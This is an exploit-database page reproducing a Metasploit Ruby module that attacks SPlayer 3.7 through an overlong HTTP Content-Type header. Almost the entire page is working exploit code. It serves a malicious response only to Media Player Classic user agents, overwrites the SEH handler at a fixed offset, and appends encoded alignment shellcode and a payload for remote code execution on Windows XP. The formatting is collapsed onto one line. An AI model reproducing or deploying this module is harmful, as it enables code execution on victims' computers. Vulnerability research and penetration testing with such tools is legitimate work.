[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SPlayer 3.7 Content-Type Buffer Overflow
# Published : 2011-05-11
# Author : metasploit
# Previous Title : ICONICS WebHMI ActiveX Buffer Overflow
# Next Title : DreamBox DM500(+) Arbitrary File Download Vulnerability


			
### $Id: splayer_content_type.rb 12581 2011-05-11 00:18:11Z sinn3r $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote	Rank = NormalRanking	include Msf::Exploit::Remote::HttpServer::HTML	def initialize(info={})		super(update_info(info,			'Name'           => "SPlayer 3.7 Content-Type Buffer Overflow",			'Description'    => %q{					This module exploits a vulnerability in SPlayer v3.7 or piror.  When SPlayer				requests the URL of a media file (video or audio), it is possible to gain arbitrary				remote code execution due to a buffer overflow caused by an exceeding length of data				as the 'Content-Type' parameter.			},			'License'        => MSF_LICENSE,			'Version'        => "$Revision: 12581 $",			'Author'         =>				[					'xsploitedsec <xsploitedsecurity[at]gmail.com>',  #Initial discovery, PoC					'sinn3r', #Metasploit				],			'References'     =>				[					['URL', 'http://www.exploit-db.com/exploits/17243/'],				],			'Payload'        =>				{					'BadChars'        => "/x00/x0a/x0d/x80/x82/x83/x84/x85/x86/x87/x88/x89/x8a/x8b/x8c/x8d/x8e/x8f/x91/x92/x93/x94/x95/x96/x97/x98/x99/x9a/x9b/x9c/x9d/x9e/x9f",					'StackAdjustment' => -3500,					'EncoderType'     => Msf::Encoder::Type::AlphanumMixed,					'BufferRegister'  => 'ECX',				},			'DefaultOptions'  =>				{					'ExitFunction'         => "seh",					'InitialAutoRunScript' => 'migrate -f',				},			'Platform'       => 'win',			'Targets'        =>				[					[						'Windows XP SP2/XP3',						{							'Offset' => 2073,    #Offset to SEH							'Ret'    => 0x7325,  #Unicode P/P/R (splayer.exe)							'Max'    => 30000,   #Max buffer size						}					],				],			'Privileged'     => false,			'DisclosureDate' => "May 4 2011",			'DefaultTarget'  => 0))	end	def get_unicode_payload(p)		encoder = framework.encoders.create("x86/unicode_mixed")		encoder.datastore.import_options_from_hash( {'BufferRegister'=>'EAX'} )		unicode_payload = encoder.encode(p, nil, nil, platform)		return unicode_payload	end	def on_request_uri(cli, request)		agent = request.headers['User-Agent']		if agent !~ /Media Player Classic/			send_not_found(cli)			print_error("#{cli.peerhost}:#{cli.peerport} Unknown user-agent")			return		end		nop = "/x73"		#MOV EAX,EDI; XOR AL,C3; INC EAX; XOR AL,79; PUSH EAX; POP ECX; JMP SHORT 0x40		alignment = "/x8b/xc7/x34/xc3/x40/x34/x79/x50/x59/xeb/x40"		padding = nop*6		p = get_unicode_payload(alignment + padding + payload.encoded)		sploit = rand_text_alpha(2073)		sploit << "/x61/x73"		sploit << "/x25/x73"		sploit << nop		sploit << "/x55"		sploit << nop		sploit << "/x58"		sploit << nop		sploit << "/x05/x19/x11"		sploit << nop		sploit << "/x2d/x11/x11"		sploit << nop		sploit << "/x50"		sploit << nop		sploit << "/x50"		sploit << nop		sploit << "/x5f"		sploit << nop		sploit << "/xc3"		sploit << rand_text_alpha(1000)		sploit << p		sploit << rand_text_alpha(target['Max']-sploit.length)		print_status("Sending malicious content-type to #{cli.peerhost}:#{cli.peerport}...")		send_response(cli, '', {'Content-Type'=>sploit})	endend